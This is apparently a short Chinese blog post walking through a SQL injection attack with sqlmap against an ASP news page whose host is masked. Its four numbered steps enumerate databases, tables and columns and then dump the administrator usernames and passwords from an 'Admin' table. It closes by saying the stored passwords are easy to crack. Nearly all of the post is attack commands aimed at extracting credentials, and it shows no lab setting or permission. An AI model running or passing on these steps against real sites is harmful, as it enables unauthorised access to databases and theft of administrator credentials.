1.--dbs 跑数据库名
./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --dbs
2. --tables 跑表名
./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --tables -D LibraryWeb
16张表,太卡了,看的出admin表可用
3. --columns 跑字段名
./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --columns -D LibraryWeb -T Admin

admin和password字段可用
4. --dump 跑用户名密码数据
./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --dump -D LibraryWeb -T Admin -C "admin,password"

其实,不爆columns 表名的话,直接dump也是能爆出来密码的,如下:
./sqlmap -u http://xxxx/onews_zuixin.asp?id=257 --dump -D LibraryWeb -T Admin

然后,解密 一看这密码就乐了,雷池加密啊,很好解的.

没有评论:
发表评论